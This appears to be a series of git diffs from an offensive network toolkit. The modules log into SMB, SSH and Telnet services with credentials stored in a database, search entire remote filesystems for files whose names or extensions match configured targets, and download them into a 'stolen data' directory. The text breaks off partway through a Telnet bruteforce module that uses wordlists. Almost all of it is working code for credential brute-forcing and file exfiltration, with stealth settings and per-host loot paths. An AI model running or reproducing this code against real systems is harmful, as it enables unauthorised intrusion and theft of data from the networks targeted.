logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
def _timeout():
if not self.smb_connected:
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first (''/'')
try:
conn = self.connect_smb(ip, '', '')
if conn:
shares = self.list_shares(conn)
for s in shares:
files = self.find_files(conn, s.name, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, s.name, remote, base)
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
success = True
try:
conn.close()
except Exception:
pass
except Exception as e:
logger.info(f"Anonymous SMB failed on {ip}: {e}")
if success:
timer.cancel()
return 'success'
# Per-share credentials
for share, creds in creds_by_share.items():
if share in self.IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
conn = self.connect_smb(ip, username, password)
if not conn:
continue
files = self.find_files(conn, share, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share, remote, base)
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
success = True
try:
conn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,173 +1,356 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import paramiko
import logging
import time
from rich.console import Console
import logging
import paramiko
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit :
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
# --------------------- Identity cache (hosts) ---------------------
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
ssh.connect(
hostname=ip,
username=username,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
allow_agent=False,
look_for_keys=False,
)
logger.info(f"Connected to {ip} via SSH as {username}")
return ssh
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
"""
List candidate files from remote dir, filtered by config:
- shared_data.steal_file_extensions (endswith)
- shared_data.steal_file_names (substring match)
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
"""
# Quiet 'permission denied' messages via redirection
cmd = f'find {dir_path} -type f 2>/dev/null'
stdin, stdout, stderr = ssh.exec_command(cmd)
files = (stdout.read().decode(errors="ignore") or "").splitlines()
exts = set(self.shared_data.steal_file_extensions or [])
names = set(self.shared_data.steal_file_names or [])
if not exts and not names:
# If no filters are defined, do nothing (too risky to pull everything).
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
return []
matches: List[str] = []
for fpath in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
fname = os.path.basename(fpath)
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
matches.append(fpath)
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
# Max file size to download (10 MB) — protects RPi Zero RAM
_MAX_FILE_SIZE = 10 * 1024 * 1024
def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
"""
Download a single remote file into the given local dir, preserving subdirs.
Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
"""
sftp = ssh.open_sftp()
self.sftp_connected = True # first time we open SFTP, mark as connected
try:
# Check file size before downloading
try:
st = sftp.stat(remote_file)
if st.st_size and st.st_size > self._MAX_FILE_SIZE:
logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
return
except Exception:
pass # stat failed, try download anyway
# Preserve partial directory structure under local_dir
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
finally:
try:
sftp.close()
except Exception:
pass
# --------------------- Orchestrator entrypoint ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Steal files from the remote server using SSH.
Orchestrator entrypoint (signature preserved):
- ip: target IP
- port: str (expected '22')
- row: current target row (compat structure built by shared_data)
- status_key: action name (b_class)
Returns 'success' if at least one file stolen; else 'failed'.
"""
timer = None
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
# Gather credentials from DB
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
if not creds:
logger.error(f"No SSH credentials for {ip}. Skipping.")
return 'failed'
# Define a timer: if we never establish SFTP in 4 minutes, abort
def _timeout():
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
# Identify where to save loot
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"ssh/{mac}_{ip}")
# Try each credential until success (or interrupted)
success_any = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying credential {username} for {ip}")
ssh = self.connect_ssh(ip, username, password, port=port_i)
# Search from root; filtered by config
files = self.find_files(ssh, '/')
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted during download.")
break
self.steal_file(ssh, remote, base_dir)
logger.success(f"Successfully stole {len(files)} files from {ip}:{port_i} as {username}")
success_any = True
try:
ssh.close()
except Exception:
pass
if success_any:
break # one successful cred is enough
except Exception as e:
# Stay quiet on Paramiko internals; just log the reason and try next cred
logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")
return 'success' if success_any else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
finally:
if timer:
timer.cancel()
if __name__ == "__main__":
# Minimal smoke test if run standalone (not used in production; orchestrator calls execute()).
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
sd = SharedData()
action = StealFilesSSH(sd)
# Example (replace with a real IP that has creds in DB):
# result = action.execute("192.168.1.10", "22", {"MAC Address": "AA:BB:CC:DD:EE:FF"}, b_status)
# print("Result:", result)
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -1,180 +1,218 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
steal_files_telnet.py — Telnet file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (TelnetBruteforce).
- Credentials read from DB.creds (service='telnet'); we try each pair.
- Files found via 'find / -type f', then retrieved with 'cat'.
- Output under: {data_stolen_dir}/telnet/{mac}_{ip}/...
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesTelnet initialized")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naïf mais identique à l'original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
files = out.splitlines()
matches = []
for f in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
fname = os.path.basename(f.strip())
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
matches.append(f.strip())
logger.info(f"Found {len(matches)} matching files under {dir_path}")
return matches
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
logger.error(f"Telnet find error: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("Steal interrupted.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
logger.error(f"Telnet download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
if not creds:
logger.error(f"No Telnet credentials for {ip}. Skipping.")
return 'failed'
def _timeout():
if not self.telnet_connected:
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
success = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
tn = self.connect_telnet(ip, username, password)
if not tn:
continue
files = self.find_files(tn, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(tn, remote, base_dir)
logger.success(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
tn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Telnet loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,288 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class TelnetBruteforce:
"""Wrapper orchestrateur -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Lance le bruteforce Telnet pour (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
